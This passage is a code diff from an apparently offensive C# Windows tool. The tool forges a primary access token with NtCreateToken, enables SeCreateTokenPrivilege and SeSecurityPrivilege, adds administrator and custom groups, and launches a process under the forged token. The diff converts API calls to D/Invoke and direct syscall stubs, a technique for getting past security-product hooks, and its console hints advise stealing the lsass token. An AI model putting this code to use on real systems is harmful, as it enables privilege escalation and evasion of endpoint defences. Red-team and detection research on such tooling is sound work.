-            long expirationTime = long.MaxValue / 2;
-
-            phNewToken = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(IntPtr)));
-
-            //out/ref hToken - required
-            //Ref Expirationtime - required
-            uint ntRetVal = ntdll.NtCreateToken(
-                out phNewToken,
-                Winnt.TOKEN_ALL_ACCESS,
-                ref objectAttributes,
-                Winnt._TOKEN_TYPE.TokenPrimary,
-                ref systemLuid,
-                ref expirationTime,
-                ref ti.tokenUser,
-                ref ti.tokenGroups,
-                ref ti.tokenPrivileges,
-                ref ti.tokenOwner,
-                ref ti.tokenPrimaryGroup,
-                ref ti.tokenDefaultDacl,
-                ref ti.tokenSource
-            );
+            uint ntRetVal = 0;
+            using (TokenInformation ti = new TokenInformation(hWorkingToken))
+            {
+                ti.OpenProcessToken(processId);
+                ti.SetWorkingTokenToRemote();
+
+                ti.GetTokenSource();
+                ti.GetTokenUser();
+                ti.GetTokenGroups();
+                ti.GetTokenPrivileges();
+                ti.GetTokenOwner();
+                ti.GetTokenPrimaryGroup();
+                ti.GetTokenDefaultDacl();
+
+                Winnt._LUID systemLuid = Winnt.SYSTEM_LUID;
+                long expirationTime = long.MaxValue / 2;
+
+                phNewToken = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(IntPtr)));
+
+                IntPtr hNtCreateToken = Generic.GetSyscallStub("NtCreateToken");
+                MonkeyWorks.ntdll.NtCreateToken fSyscallNtCreateToken = (MonkeyWorks.ntdll.NtCreateToken)Marshal.GetDelegateForFunctionPointer(hNtCreateToken, typeof(MonkeyWorks.ntdll.NtCreateToken));
+
+                ntRetVal = fSyscallNtCreateToken(
+                    out phNewToken,
+                    Winnt.TOKEN_ALL_ACCESS,
+                    ref objectAttributes,
+                    Winnt._TOKEN_TYPE.TokenPrimary,
+                    ref systemLuid,
+                    ref expirationTime,
+                    ref ti.tokenUser,
+                    ref ti.tokenGroups,
+                    ref ti.tokenPrivileges,
+                    ref ti.tokenOwner,
+                    ref ti.tokenPrimaryGroup,
+                    ref ti.tokenDefaultDacl,
+                    ref ti.tokenSource
+                );
+            }
 
             if (0 != ntRetVal)
             {
@@ -310,9 +401,17 @@ ref ti.tokenSource
             }
 
             SetWorkingTokenToNewToken();
-            StartProcessAsUser(command);           
+            StartProcessAsUser(command);
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Checks if SeCreateTokenPrivilege & SeSecurityPrivilege is present and enabled 
+        /// on the token if it present but not enabled on the token, it is automatically 
+        /// enabled
+        /// </summary>
+        /// <param name="command"></param>
+        ////////////////////////////////////////////////////////////////////////////////
         private bool _CheckPrivileges()
         {
             bool exists, enabled;
@@ -320,79 +419,87 @@ private bool _CheckPrivileges()
             using (TokenInformation ti = new TokenInformation(hWorkingToken))
             {
                 ti.SetWorkingTokenToSelf();
+
+                ////////////////////////////////////////////////////////////////////////////////
+                // Checks if SeCreateTokenPrivilege is present and enabled on the token
+                // if it present but not enabled on the token, it is automatically enabled
+                ////////////////////////////////////////////////////////////////////////////////
                 if (!ti.CheckTokenPrivilege(Winnt.SE_CREATETOKEN_NAME, out exists, out enabled))
                 {
                     Console.WriteLine("[-] Check Token Privilege Failed");
                     return false;
                 }
-            }
-
-            if (!exists)
-            {
-                Console.WriteLine("[-] {0} is not present on the token", Winnt.SE_CREATETOKEN_NAME);
-                Console.WriteLine("[-] Steal_Token lsass cmd.exe");
-                Console.WriteLine("[-] Add_Privilege SeCreateTokenPrivilege");
-                return false;
-            }
-
-            if (!enabled)
-            {
-                Console.WriteLine("[-] {0} is not enabled on the token", Winnt.SE_CREATETOKEN_NAME);
-                Console.WriteLine("[*] Enabling {0} on the token", Winnt.SE_CREATETOKEN_NAME);
-                using (TokenManipulation tm = new TokenManipulation(hWorkingToken))
+                if (!exists)
+                {
+                    Console.WriteLine("[-] {0} is not present on the token", Winnt.SE_CREATETOKEN_NAME);
+                    Console.WriteLine("[-] Steal_Token lsass cmd.exe");
+                    Console.WriteLine("[-] Add_Privilege SeCreateTokenPrivilege");
+                    return false;
+                }
+                if (!enabled)
                 {
-                    tm.SetWorkingTokenToSelf();
-                    if (!tm.SetTokenPrivilege(Winnt.SE_CREATETOKEN_NAME, Winnt.TokenPrivileges.SE_PRIVILEGE_ENABLED))
+                    Console.WriteLine("[-] {0} is not enabled on the token", Winnt.SE_CREATETOKEN_NAME);
+                    Console.WriteLine("[*] Enabling {0} on the token", Winnt.SE_CREATETOKEN_NAME);
+                    using (TokenManipulation tm = new TokenManipulation(hWorkingToken))
                     {
-                        return false;   
+                        tm.SetWorkingTokenToSelf();
+                        if (!tm.SetTokenPrivilege(Winnt.SE_CREATETOKEN_NAME, Winnt.TokenPrivileges.SE_PRIVILEGE_ENABLED))
+                        {
+                            return false;
+                        }
                     }
                 }
-            }
-            else
-            {
-                Console.WriteLine("[+] {0} is present and enabled on the token", Winnt.SE_CREATETOKEN_NAME);
-            }
+                else
+                {
+                    Console.WriteLine("[+] {0} is present and enabled on the token", Winnt.SE_CREATETOKEN_NAME);
+                }
 
-            using (TokenInformation ti = new TokenInformation(hWorkingToken))
-            {
-                ti.SetWorkingTokenToSelf();
+                ////////////////////////////////////////////////////////////////////////////////
+                // Checks if SeSecurityPrivilege is present and enabled on the token
+                // if it present but not enabled on the token, it is automatically enabled
+                ////////////////////////////////////////////////////////////////////////////////
                 if (!ti.CheckTokenPrivilege(Winnt.SE_SECURITY_NAME, out exists, out enabled))
                 {
                     Console.WriteLine("[-] Check Token Privilege Failed");
                     return false;
                 }
-
-            }
-
-            if (!exists)
-            {
-                Console.WriteLine("[-] {0} is not present on the token", Winnt.SE_SECURITY_NAME);
-                Console.WriteLine("[-] This should be present on existing high integrity tokens");
-                Console.WriteLine("[-] Add_Privilege SeCreateTokenPrivilege");
-                return false;
-            }
-
-            if (!enabled)
-            {
-                Console.WriteLine("[-] {0} is not enabled on the token", Winnt.SE_SECURITY_NAME);
-                Console.WriteLine("[*] Enabling {0} on the token", Winnt.SE_SECURITY_NAME);
-                using (TokenManipulation tm = new TokenManipulation(hWorkingToken))
+                if (!exists)
                 {
-                    tm.SetWorkingTokenToSelf();
-                    if (!tm.SetTokenPrivilege(Winnt.SE_SECURITY_NAME, Winnt.TokenPrivileges.SE_PRIVILEGE_ENABLED))
+                    Console.WriteLine("[-] {0} is not present on the token", Winnt.SE_SECURITY_NAME);
+                    Console.WriteLine("[-] This should be present on existing high integrity tokens");
+                    Console.WriteLine("[-] Add_Privilege SeCreateTokenPrivilege");
+                    return false;
+                }
+                if (!enabled)
+                {
+                    Console.WriteLine("[-] {0} is not enabled on the token", Winnt.SE_SECURITY_NAME);
+                    Console.WriteLine("[*] Enabling {0} on the token", Winnt.SE_SECURITY_NAME);
+                    using (TokenManipulation tm = new TokenManipulation(hWorkingToken))
                     {
-                        return false;
+                        tm.SetWorkingTokenToSelf();
+                        if (!tm.SetTokenPrivilege(Winnt.SE_SECURITY_NAME, Winnt.TokenPrivileges.SE_PRIVILEGE_ENABLED))
+                        {
+                            return false;
+                        }
                     }
                 }
-            }
-            else
-            {
-                Console.WriteLine("[+] {0} is present and enabled on the token", Winnt.SE_CREATETOKEN_NAME);
+                else
+                {
+                    Console.WriteLine("[+] {0} is present and enabled on the token", Winnt.SE_CREATETOKEN_NAME);
+                }
             }
 
             return true;
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Creates the TOKEN_USER Structure
+        /// No Conversions Required
+        /// enabled
+        /// </summary>
+        /// <param name="command"></param>
+        ////////////////////////////////////////////////////////////////////////////////
         private bool CreateTokenUser(string domain, string userName, out Ntifs._TOKEN_USER tokenUser)
         {
             Console.WriteLine("[*] Creating _TOKEN_USER");
@@ -408,21 +515,45 @@ private bool CreateTokenUser(string domain, string userName, out Ntifs._TOKEN_US
             return true;
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Creates the TOKEN_GROUPS Structure
+        /// Converted to D/Invoke GetPebLdrModuleEntry/GetExportAddress/LoadModuleFromDisk
+        /// </summary>
+        /// <param name="command"></param>
+        /// <returns></returns>
+        ////////////////////////////////////////////////////////////////////////////////
         internal bool CreateTokenGroups(string domain, string userName, out Ntifs._TOKEN_GROUPS tokenGroups, out Winnt._TOKEN_PRIMARY_GROUP tokenPrimaryGroup, string[] groups)
         {
-            uint LG_INCLUDE_INDIRECT = 0x0001;
-
             Console.WriteLine("[*] _TOKEN_GROUPS");
 
             tokenGroups = new Ntifs._TOKEN_GROUPS();
             tokenGroups.Initialize();
             tokenPrimaryGroup = new Winnt._TOKEN_PRIMARY_GROUP();
 
+            IntPtr hnetapi32 = Generic.GetPebLdrModuleEntry("netapi32.dll");
+            if (IntPtr.Zero == hnetapi32)
+            {
+                hnetapi32 = Generic.LoadModuleFromDisk("netapi32.dll");
+                if (IntPtr.Zero == hnetapi32)
+                {
+                    Console.WriteLine("Unable to load netapi32.dll");
+                    return false;
+                }
+            }
+
+            uint LG_INCLUDE_INDIRECT = 0x0001;
+
             #region NetUserGetLocalGroups
-            //Console.WriteLine(" - NetUserGetLocalGroups");
+            ////////////////////////////////////////////////////////////////////////////////
+            // ntRetVal = netapi32.NetUserGetLocalGroups(domain, userName.ToLower(), 0, LG_INCLUDE_INDIRECT, out bufPtr, -1, ref localEntriesRead, ref localTotalEntriesRead);
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hNetUserGetLocalGroups = Generic.GetExportAddress(hnetapi32, "NetUserGetLocalGroups");
+            MonkeyWorks.netapi32.NetUserGetLocalGroups fNetUserGetLocalGroups = (MonkeyWorks.netapi32.NetUserGetLocalGroups)Marshal.GetDelegateForFunctionPointer(hNetUserGetLocalGroups, typeof(MonkeyWorks.netapi32.NetUserGetLocalGroups));
+
+            lmaccess._LOCALGROUP_USERS_INFO_0[] localgroupUserInfo;
+            IntPtr bufPtr = IntPtr.Zero;
 
-            lmaccess._LOCALGROUP_USERS_INFO_0[] localgroupUserInfo = new lmaccess._LOCALGROUP_USERS_INFO_0[0];
-            IntPtr bufPtr;
             uint ntRetVal = netapi32.NetUserGetLocalGroups(
                 domain,
                 userName.ToLower(),
@@ -434,9 +565,30 @@ internal bool CreateTokenGroups(string domain, string userName, out Ntifs._TOKEN
                 ref localTotalEntriesRead
             );
 
+            /*
+            try
+            {
+                ntRetVal = fNetUserGetLocalGroups(
+                    domain,
+                    userName.ToLower(),
+                    0,
+                    LG_INCLUDE_INDIRECT,
+                    out bufPtr,
+                    -1,
+                    ref localEntriesRead,
+                    ref localTotalEntriesRead
+                );
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] NetUserGetLocalGroups Generated an Exception");
+                Console.WriteLine(ex);
+            }
+            */
             if (0 != ntRetVal)
             {
-                Misc.GetNtError("NetUserGetLocalGroups", ntRetVal);
+                Misc.GetNetApiError("NetUserGetLocalGroups", ntRetVal);
+
             }
 
             localgroupUserInfo = new lmaccess._LOCALGROUP_USERS_INFO_0[localEntriesRead];
@@ -445,27 +597,49 @@ ref localTotalEntriesRead
 
             for (int i = 0; i < localEntriesRead; i++)
             {
-                var itemPtr = new IntPtr(bufPtr.ToInt64() + (Marshal.SizeOf(typeof(lmaccess._LOCALGROUP_USERS_INFO_0)) * i));
-                localgroupUserInfo[i] = (lmaccess._LOCALGROUP_USERS_INFO_0)Marshal.PtrToStructure(itemPtr, typeof(lmaccess._LOCALGROUP_USERS_INFO_0));
-                Console.WriteLine(" [+] {0}", localgroupUserInfo[i].lgrui0_name);
+                try
+                {
+                    var itemPtr = new IntPtr(bufPtr.ToInt64() + (Marshal.SizeOf(typeof(lmaccess._LOCALGROUP_USERS_INFO_0)) * i));
+                    localgroupUserInfo[i] = (lmaccess._LOCALGROUP_USERS_INFO_0)Marshal.PtrToStructure(itemPtr, typeof(lmaccess._LOCALGROUP_USERS_INFO_0));
+                    Console.WriteLine(" [+] {0}", localgroupUserInfo[i].lgrui0_name);
+                }
+                catch (Exception ex)
+                {
+                    Console.WriteLine("[-] PtrToStructure Generated an Exception");
+                    Console.WriteLine(ex.Message);
+                }
             }
             #endregion
 
             #region NetUserGetGroups
-            lmaccess._GROUP_USERS_INFO_0[] globalGroupUserInfo;// = new lmaccess._GROUP_USERS_INFO_0[0];
-            ntRetVal = netapi32.NetUserGetGroups(
-                domain,
-                userName.ToLower(),
-                0,
-                out bufPtr,
-                -1,
-                ref globalEntriesRead,
-                ref globalEotalEntriesRead
-            );
+            ////////////////////////////////////////////////////////////////////////////////
+            //netapi32.NetUserGetGroups(domain, userName.ToLower(), 0, out bufPtr, -1, ref globalEntriesRead, ref globalEotalEntriesRead);
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hNetUserGetGroups = Generic.GetExportAddress(hnetapi32, "NetUserGetGroups");
+            MonkeyWorks.netapi32.NetUserGetGroups fNetUserGetGroups = (MonkeyWorks.netapi32.NetUserGetGroups)Marshal.GetDelegateForFunctionPointer(hNetUserGetGroups, typeof(MonkeyWorks.netapi32.NetUserGetGroups));
+
+            lmaccess._GROUP_USERS_INFO_0[] globalGroupUserInfo;
+            try
+            {
+                ntRetVal = netapi32.NetUserGetGroups(
+                    domain,
+                    userName.ToLower(),
+                    0,
+                    out bufPtr,
+                    -1,
+                    ref globalEntriesRead,
+                    ref globalEotalEntriesRead
+                );
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] NetUserGetGroups Generated an Exception");
+                Console.WriteLine(ex.Message);
+            }
 
             if (0 != ntRetVal)
             {
-                Misc.GetNtError("NetUserGetGroups", ntRetVal);
+                Misc.GetNetApiError("NetUserGetGroups", ntRetVal);
             }
 
             globalGroupUserInfo = new lmaccess._GROUP_USERS_INFO_0[globalEntriesRead];
@@ -474,16 +648,22 @@ ref globalEotalEntriesRead
 
             for (int i = 0; i < localEntriesRead; i++)
             {
-                var itemPtr = new IntPtr(bufPtr.ToInt64() + (Marshal.SizeOf(typeof(lmaccess._GROUP_USERS_INFO_0)) * i));
-                globalGroupUserInfo[i] = (lmaccess._GROUP_USERS_INFO_0)Marshal.PtrToStructure(itemPtr, typeof(lmaccess._GROUP_USERS_INFO_0));
-                Console.WriteLine(" [+] {0}", globalGroupUserInfo[i].grui0_name);
+                try
+                {
+                    var itemPtr = new IntPtr(bufPtr.ToInt64() + (Marshal.SizeOf(typeof(lmaccess._GROUP_USERS_INFO_0)) * i));
+                    globalGroupUserInfo[i] = (lmaccess._GROUP_USERS_INFO_0)Marshal.PtrToStructure(itemPtr, typeof(lmaccess._GROUP_USERS_INFO_0));
+                    Console.WriteLine(" [+] {0}", globalGroupUserInfo[i].grui0_name);
+                }
+                catch (Exception ex)
+                {
+                    Console.WriteLine("[-] PtrToStructure Generated an Exception");
+                    Console.WriteLine(ex.Message);
+                }
             }
             #endregion
 
             #region Default Admin Entries
 
-            Console.WriteLine("[+] Default Admin Entries: {0}");
-
             uint groupsAttributes = (uint)(Winnt.SE_GROUP_ENABLED | Winnt.SE_GROUP_ENABLED_BY_DEFAULT | Winnt.SE_GROUP_MANDATORY);
 
             /*
@@ -536,9 +716,6 @@ ref globalEotalEntriesRead
             #endregion
 
             #region Custom Groups
-
-            Console.WriteLine("[+] Custom Entries: {0}");
-
             //Custom groups
             foreach (string group in groups)
             {
@@ -550,17 +727,9 @@ ref globalEotalEntriesRead
                     d = split[0];
                     groupname = split[1];
                 }
-
-                try
-                {
-                    string sid = new NTAccount(d, groupname).Translate(typeof(SecurityIdentifier)).Value;
-                    InitializeSid(sid, ref tokenGroups.Groups[extraGroups].Sid);
-                    tokenGroups.Groups[extraGroups++].Attributes = groupsAttributes;
-                }
-                catch (IdentityNotMappedException ex)
-                {
-                    Console.WriteLine(ex.Message);
-                }
+                string sid = new NTAccount(d, groupname).Translate(typeof(SecurityIdentifier)).Value;
+                InitializeSid(sid, ref tokenGroups.Groups[extraGroups].Sid);
+                tokenGroups.Groups[extraGroups++].Attributes = groupsAttributes;
             }
             #endregion
 
@@ -601,19 +770,33 @@ ref globalEotalEntriesRead
             {
                 string sid, account;
                 TokenInformation.ReadSidAndName(tokenGroups.Groups[i].Sid, out sid, out account);
-                Console.WriteLine(" ({0}) {1,-50} {2}", i, sid, account);
+                Console.WriteLine(" ({0}) {1,-20} {2}", i, sid, account);
             }
 
             return true;
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Creates the TOKEN_PRIVILEGES Structure
+        /// Converted to D/Invoke GetPebLdrModuleEntry/GetExportAddress
+        /// </summary>
+        /// <param name="tokenUser"></param>
+        /// <param name="tokenGroups"></param>
+        /// <param name="tokenPrivileges"></param>
+        /// <returns></returns>
+        ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
         private bool CreateTokenPrivileges(Ntifs._TOKEN_USER tokenUser, Ntifs._TOKEN_GROUPS tokenGroups, out Winnt._TOKEN_PRIVILEGES_ARRAY tokenPrivileges)
         {
             Console.WriteLine("[*] _TOKEN_PRIVILEGES");
 
-            tokenPrivileges = new Winnt._TOKEN_PRIVILEGES_ARRAY();
+            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
+            IntPtr hLsaOpenPolicy = Generic.GetExportAddress(hadvapi32, "LsaOpenPolicy");
+            MonkeyWorks.advapi32.LsaOpenPolicy fLsaOpenPolicy = (MonkeyWorks.advapi32.LsaOpenPolicy)Marshal.GetDelegateForFunctionPointer(hLsaOpenPolicy, typeof(MonkeyWorks.advapi32.LsaOpenPolicy));
 
-            //Console.WriteLine(" - LsaOpenPolicy");
+            tokenPrivileges = new Winnt._TOKEN_PRIVILEGES_ARRAY();
             ntsecapi._LSA_UNICODE_STRING systemName = new ntsecapi._LSA_UNICODE_STRING();
             lsalookup._LSA_OBJECT_ATTRIBUTES lsaobjectAttributes = new lsalookup._LSA_OBJECT_ATTRIBUTES()
             {
@@ -624,23 +807,31 @@ private bool CreateTokenPrivileges(Ntifs._TOKEN_USER tokenUser, Ntifs._TOKEN_GRO
                 SecurityDescriptor = IntPtr.Zero,
                 SecurityQualityOfService = IntPtr.Zero
             };
-
             IntPtr hPolicyHandle = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(IntPtr)));
-            uint ntRetVal = advapi32.LsaOpenPolicy(
-                ref systemName,
-                ref lsaobjectAttributes,
-                (uint)lsalookup.LSA_ACCESS_MASK.POLICY_ALL_ACCESS,
-                out hPolicyHandle
-            );
-            if (0 != ntRetVal)
+
+            ////////////////////////////////////////////////////////////////////////////////
+            // advapi32.LsaOpenPolicy(ref systemName, ref lsaobjectAttributes, (uint)lsalookup.LSA_ACCESS_MASK.POLICY_ALL_ACCESS, out hPolicyHandle);
+            ////////////////////////////////////////////////////////////////////////////////
+            uint ntRetVal = 0;
+            try
             {
-                Misc.GetNtError("LsaOpenPolicy", ntRetVal);
+                ntRetVal = fLsaOpenPolicy(
+                    ref systemName,
+                    ref lsaobjectAttributes,
+                    (uint)lsalookup.LSA_ACCESS_MASK.POLICY_ALL_ACCESS,
+                    ref hPolicyHandle
+                );
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] LsaOpenPolicy Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
                 return false;
             }
 
-            if (IntPtr.Zero == hPolicyHandle)
+            if (0 != ntRetVal || IntPtr.Zero == hPolicyHandle)
             {
-                Misc.GetNtError("hPolicyHandle", ntRetVal);
+                Misc.GetNtError("LsaOpenPolicy", ntRetVal);
                 return false;
             }
 
@@ -666,9 +857,21 @@ out hPolicyHandle
                 j++;
             }
 
+            Marshal.FreeHGlobal(hPolicyHandle);
+
             return true;
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Creates the TOKEN_OWNER Structure
+        /// No Conversions Required
+        /// </summary>
+        /// <param name="domain"></param>
+        /// <param name="userName"></param>
+        /// <param name="tokenOwner"></param>
+        /// <returns></returns>
+        ////////////////////////////////////////////////////////////////////////////////
         private bool CreateTokenOwner(string domain, string userName, out Ntifs._TOKEN_OWNER tokenOwner)
         {
             Console.WriteLine("[*] _TOKEN_OWNER");
@@ -683,14 +886,23 @@ private bool CreateTokenOwner(string domain, string userName, out Ntifs._TOKEN_O
             return true;
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Creates the TOKEN_PRIMARY_GROUP Structure
+        /// No Conversions Required
+        /// Not Currently Used
+        /// </summary>
+        /// <param name="firstLocalgroupUserInfo"></param>
+        /// <param name="tokenPrimaryGroup"></param>
+        /// <returns></returns>
+        ////////////////////////////////////////////////////////////////////////////////
         private bool CreateTokenPrimaryGroup(string firstLocalgroupUserInfo, out Winnt._TOKEN_PRIMARY_GROUP tokenPrimaryGroup)
         {
             Console.WriteLine("_TOKEN_PRIMARY_GROUP");
             tokenPrimaryGroup = new Winnt._TOKEN_PRIMARY_GROUP()
             {
-                PrimaryGroup = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(System.IntPtr)))
+                PrimaryGroup = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(IntPtr)))
             };
-            
 
             if (!string.IsNullOrEmpty(firstLocalgroupUserInfo))
             {
@@ -698,15 +910,18 @@ private bool CreateTokenPrimaryGroup(string firstLocalgroupUserInfo, out Winnt._
                 _LookupSid(null, firstLocalgroupUserInfo, ref hSid);
                 tokenPrimaryGroup = (Winnt._TOKEN_PRIMARY_GROUP)Marshal.PtrToStructure(hSid, typeof(Winnt._TOKEN_PRIMARY_GROUP));
             }
-            else
-            {
-                //Everyone
-                //Winnt.SECURITY_NULL_SID_AUTHORITY
-                //InitializeSid(Winnt.SECURITY_NT_AUTHORITY, new uint[] { 32, 544, 0, 0, 0, 0, 0, 0 }, ref tokenPrimaryGroup.PrimaryGroup);
-            }
+
             return true;
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Creates the TOKEN_DEFAULT_DACL Structure
+        /// No Conversions Required
+        /// </summary>
+        /// <param name="tokenDefaultDacl"></param>
+        /// <returns></returns>
+        ////////////////////////////////////////////////////////////////////////////////
         private bool CreateTokenDefaultDACL(out Winnt._TOKEN_DEFAULT_DACL tokenDefaultDacl)
         {
             Console.WriteLine("[*] _TOKEN_DEFAULT_DACL");
@@ -718,11 +933,35 @@ private bool CreateTokenDefaultDACL(out Winnt._TOKEN_DEFAULT_DACL tokenDefaultDa
             return true;
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Creates the TOKEN_SOURCE Structure
+        /// Converted to D/Invoke Syscalls
+        /// <param name="tokenSource"></param>
+        /// <returns></returns>
+        ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
         private bool CreateTokenSource(out Winnt._TOKEN_SOURCE tokenSource)
         {
             Console.WriteLine("[*] _TOKEN_SOURCE");
             tokenSource = new Winnt._TOKEN_SOURCE();
-            uint ntRetVal = ntdll.NtAllocateLocallyUniqueId(ref tokenSource.SourceIdentifier);
+
+            IntPtr hNtAllocateLocallyUniqueId = Generic.GetSyscallStub("NtAllocateLocallyUniqueId");
+            MonkeyWorks.ntdll.NtAllocateLocallyUniqueId fSyscallNtAllocateLocallyUniqueId = (MonkeyWorks.ntdll.NtAllocateLocallyUniqueId)Marshal.GetDelegateForFunctionPointer(hNtAllocateLocallyUniqueId, typeof(MonkeyWorks.ntdll.NtAllocateLocallyUniqueId));
+
+            uint ntRetVal = 0;
+            try
+            {
+                ntRetVal = fSyscallNtAllocateLocallyUniqueId(ref tokenSource.SourceIdentifier);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] NtAllocateLocallyUniqueId Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
+            }
+
             if (0 != ntRetVal)
             {
                 Misc.GetNtError("NtAllocateLocallyUniqueId", ntRetVal);
@@ -732,18 +971,42 @@ private bool CreateTokenSource(out Winnt._TOKEN_SOURCE tokenSource)
             return true;
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Looks up the right/privileges assigned to a user / group based on a policy
+        /// Converted to D/Invoke GetPebLdrModuleEntry/GetExportAddress
+        /// </summary>
+        /// <param name="hPolicyHandle"></param>
+        /// <param name="sid"></param>
+        /// <param name="rights"></param>
+        /// <returns></returns>
+        ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
         private static bool _LookupRights(IntPtr hPolicyHandle, IntPtr sid, ref Dictionary<string, Winnt._LUID> rights)
         {
+            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
+
+            ////////////////////////////////////////////////////////////////////////////////
+            // advapi32.LsaEnumerateAccountRights(hPolicyHandle, sid, out hUserRights, out countOfRights);
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hLsaEnumerateAccountRights = Generic.GetExportAddress(hadvapi32, "LsaEnumerateAccountRights");
+            MonkeyWorks.advapi32.LsaEnumerateAccountRights fLsaEnumerateAccountRights = (MonkeyWorks.advapi32.LsaEnumerateAccountRights)Marshal.GetDelegateForFunctionPointer(hLsaEnumerateAccountRights, typeof(MonkeyWorks.advapi32.LsaEnumerateAccountRights));
 
-            //Console.WriteLine(" - LsaEnumerateAccountRights");
             IntPtr hUserRights;
             long countOfRights;
-            uint ntRetVal = advapi32.LsaEnumerateAccountRights(
-                hPolicyHandle,
-                sid,
-                out hUserRights,
-                out countOfRights
-            );
+
+            uint ntRetVal = 0;
+            try
+            {
+                ntRetVal = fLsaEnumerateAccountRights(hPolicyHandle, sid, out hUserRights, out countOfRights);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] LsaEnumerateAccountRights Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
+            }
 
             //Weird Quirk
             countOfRights--;
@@ -766,46 +1029,104 @@ out countOfRights
             ntsecapi._LSA_UNICODE_STRING[] userRights = new ntsecapi._LSA_UNICODE_STRING[countOfRights];
 
             ////////////////////////////////////////////////////////////////////////////////
-            ///
+            // advapi32.LookupPrivilegeValue(null, privilege, ref luid);
             ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hLookupPrivilegeValueW = Generic.GetExportAddress(hadvapi32, "LookupPrivilegeValueW");
+            MonkeyWorks.advapi32.LookupPrivilegeValueW fLookupPrivilegeValueW = (MonkeyWorks.advapi32.LookupPrivilegeValueW)Marshal.GetDelegateForFunctionPointer(hLookupPrivilegeValueW, typeof(MonkeyWorks.advapi32.LookupPrivilegeValueW));
+
             for (int i = 0; i < countOfRights; i++)
             {
+                string privilege;
                 try
                 {
                     userRights[i] = (ntsecapi._LSA_UNICODE_STRING)Marshal.PtrToStructure(new IntPtr(hUserRights.ToInt64() + (i * Marshal.SizeOf(typeof(ntsecapi._LSA_UNICODE_STRING)))), typeof(ntsecapi._LSA_UNICODE_STRING));
-                    string privilege = Marshal.PtrToStringUni(userRights[i].Buffer);
-                    Winnt._LUID luid = new Winnt._LUID();
-                    bool retVal = advapi32.LookupPrivilegeValue(null, privilege, ref luid);
-                    if (!retVal)
-                    {
-                        Console.WriteLine("[-] Privilege Not Found");
-                        return false;
-                    }
-                    Console.WriteLine(" ({0}) {1}", i, privilege);
-                    rights[privilege] = luid;
+                    privilege = Marshal.PtrToStringUni(userRights[i].Buffer);
+                }
+                catch (Exception ex)
+                {
+                    Console.WriteLine("[-] PtrToStructure Generated an Exception");
+                    Console.WriteLine("[-] {0}", ex.Message);
+                    continue;
+                }
 
+                Winnt._LUID luid = new Winnt._LUID();
+                bool retVal = false;
+                try
+                {
+                    retVal = fLookupPrivilegeValueW(null, privilege, ref luid);
                 }
                 catch (Exception ex)
                 {
-                    Console.WriteLine(ex);
-                    //return false;
+                    Console.WriteLine("[-] LookupPrivilegeValueW Generated an Exception");
+                    Console.WriteLine("[-] {0}", ex.Message);
+                    continue;
+                }
+
+                if (!retVal)
+                {
+                    Console.WriteLine("[-] Privilege Not Found");
+                    continue;
                 }
+                Console.WriteLine(" ({0}) {1}", i, privilege);
+                rights[privilege] = luid;
+
+
             }
             return true;
         }
 
-        private static void _PrintStringSID(IntPtr hSid)
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Currently unused but useful for debugging
+        /// Converted to D/Invoke GetPebLdrModuleEntry/GetExportAddress
+        /// </summary>
+        /// <param name="hSid"></param>
+        ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
+        private static string _PrintStringSID(IntPtr hSid)
         {
+            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
+            IntPtr hConvertSidToStringSidW = Generic.GetExportAddress(hadvapi32, "ConvertSidToStringSidW");
+            MonkeyWorks.advapi32.ConvertSidToStringSidW fConvertSidToStringSidW = (MonkeyWorks.advapi32.ConvertSidToStringSidW)Marshal.GetDelegateForFunctionPointer(hConvertSidToStringSidW, typeof(MonkeyWorks.advapi32.ConvertSidToStringSidW));
+
             IntPtr hStringUserSid = IntPtr.Zero;
-            advapi32.ConvertSidToStringSid(hSid, ref hStringUserSid);
-            Console.WriteLine(Marshal.PtrToStringAuto(hStringUserSid));
+            try
+            {
+                Ntifs._SID sid = (Ntifs._SID)Marshal.PtrToStructure(hSid, typeof(Ntifs._SID));
+                fConvertSidToStringSidW(ref sid, ref hStringUserSid);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] ConvertSidToStringSidW Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return string.Empty;
+            }
+
+            return Marshal.PtrToStringUni(hStringUserSid);
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // SID Lookup Wrapper
